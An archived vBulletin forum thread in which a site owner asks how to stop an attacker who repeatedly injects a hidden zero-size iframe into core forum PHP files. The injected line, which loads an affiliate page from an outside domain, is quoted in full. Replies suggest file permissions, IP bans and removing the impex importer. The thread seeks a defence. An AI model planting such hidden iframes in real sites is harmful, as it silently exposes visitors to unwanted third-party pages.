vb.org Archive
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   Forum keeps getting hacked (https://vborg.vbsupport.ru/showthread.php?t=122756)

gbechtel 08-01-2006 07:51 PM
Forum keeps getting hacked
 
I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

PHP Code:
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>"
It is usually placed at the bottom of the php file. like in forumdisplay.php

PHP Code:
$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], truefalse);
$show['forumslist'] = iif ($forumshowntruefalse);
$show['stickies'] = iif ($threadbits_sticky != ''truefalse);
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

($hook vBulletinHook::fetch_hook('forumdisplay_complete')) ? eval($hook) : false
The code messes up the template and creates a number of pop-ups.

It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?

davidw 08-01-2006 08:41 PM
You should be able to chmod them 644 I believe

bondjetta 08-01-2006 08:49 PM
Quote:
Originally Posted by christianb
You should be able to chmod them 644 I believe
mine are 644'd and i'm showing similar signs of this same dude on both AutomotiveArena.com and WorkSafeBoredom.com

gbechtel 08-01-2006 09:12 PM
Yeah mine are already 644 also. Would 444 be an option?

Gonna try it and see what happens.

UPDATE:

Ok the 444 seems to be working for the time, don't know if the lil twit has tried it again or not but how was he able to do this in the first place?

I am not a security expert by any means but I think my vB is pretty secure. (renamed admin folders, htaccess etc...)

Is this some type of mysql injection or something?

gbechtel 08-04-2006 07:54 PM
The chmod 444 did not stop the lil twit.

On top of that the files that I did a chmod on were reverted back to 644.

Another interesting item, today just before I got hacked I had a new user join the forum.

IP Address used was 201.17.220.203

Quote:
There is a new user, bunda at MassCops - Massachusetts Law Enforcement Network

To view their profile, go here:

http://www.masscops.com/forums/member.php?u=4212

Email Address : soauker@gmail.com
Birthday :
Is there anyway I can stop this guy????

davidw 08-04-2006 07:59 PM
IMO, he gave himself away (the assumption it is a he). If it were me, I would block the whole HOST IP range in the vbulletin and if you have a firewall, add it to the firewall.

gbechtel 08-04-2006 08:25 PM
Server co. says he is getting in through the impex directory....

davidw 08-04-2006 08:40 PM
Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup

gbechtel 08-04-2006 08:44 PM
already done, hope that was it...

davidw 08-04-2006 08:45 PM
Don't forget to ban his IP addresses though :P


All times are GMT. The time now is 06:42 AM.
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01131 seconds
  • Memory Usage 1,738KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_php_printable
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete